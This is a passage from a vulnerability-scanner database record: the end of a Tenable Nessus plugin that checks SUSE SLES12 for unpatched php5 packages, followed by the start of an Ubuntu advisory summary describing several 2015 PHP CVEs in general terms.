value:\"https://bugzilla.suse.com/show_bug.cgi?id=945412\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.suse.com/show_bug.cgi?id=945428\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6831/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6832/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6833/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6834/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6835/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6836/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6837/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2015-6838/\");\n # https://www.suse.com/support/update/announcement/2015/suse-su-20151633-1.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?297d28d0\");\n script_set_attribute(attribute:\"solution\", value:\n\"To install this SUSE Security Update use YaST online_update.\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Software Development Kit 12 :\n\nzypper in -t patch SUSE-SLE-SDK-12-2015-603=1\n\nSUSE Linux Enterprise Module for Web Scripting 12 :\n\nzypper in -t patch SUSE-SLE-Module-Web-Scripting-12-2015-603=1\n\nTo bring your system up-to-date, use 'zypper patch'.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-6836\");\n script_set_attribute(attribute:\"cvss3_score_source\", value:\"CVE-2015-6835\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/02\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:apache2-mod_php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bcmath-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-bz2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-calendar-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ctype-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-curl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-dom-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-enchant-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-exif-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fastcgi-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fileinfo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-fpm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ftp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gd-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gettext-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-gmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-iconv-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-intl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-json-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-ldap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mbstring-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mcrypt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-mysql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-odbc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-opcache-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-openssl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pcntl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pdo-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pgsql-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-posix-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-pspell-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-shmop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-snmp-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-soap-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sockets-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sqlite-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-suhosin-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvmsg-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvsem-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-sysvshm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-tokenizer-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-wddx-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlreader-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlrpc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xmlwriter-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-xsl-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zip-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:php5-zlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"apache2-mod_php5-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bcmath-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-bz2-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-calendar-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ctype-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-curl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dba-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-debugsource-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-dom-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-enchant-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-exif-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fastcgi-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fileinfo-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-fpm-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ftp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gd-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gettext-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-gmp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-iconv-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-intl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-json-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-ldap-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mbstring-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mcrypt-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-mysql-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-odbc-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-opcache-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-openssl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pcntl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pdo-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pgsql-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-posix-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-pspell-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-shmop-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-snmp-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-soap-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sockets-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sqlite-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-suhosin-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvmsg-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvsem-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-sysvshm-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-tokenizer-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-wddx-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlreader-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlrpc-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xmlwriter-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-xsl-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zip-debuginfo-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-5.5.14-36.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"php5-zlib-debuginfo-5.5.14-36.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"php5\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:44:28", "description": "It was discovered that the PHP phar extension incorrectly handled certain files. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2015-5589)\n\nIt was discovered that the PHP phar extension incorrectly handled certain filepaths. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-5590)\n\nTaoguang Chen discovered that PHP incorrectly handled unserializing objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6831, CVE-2015-6834, CVE-2015-6835\n\nSean Heelan discovered that PHP incorrectly handled unserializing objects. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code.\n(CVE-2015-6832)\n\nIt was discovered that the PHP phar extension incorrectly handled certain archives. A remote attacker could use this issue to cause files to be placed outside of the destination directory.\n(CVE-2015-6833)\n\nAndrea Palazzo discovered that the PHP Soap client incorrectly validated data types. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service, or possibly execute arbitrary code. (CVE-2015-6836)\n\nIt was discovered that the PHP XSLTProcessor class incorrectly handled certain data. A remote attacker could use this issue to cause PHP to crash, resulting in a denial of service. (CVE-2015-6837).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2015-10-01T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS / 14.04 LTS / 15.04 : php5 vulnerabilities (USN-2758-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5589", "CVE-2015-5590", "CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": 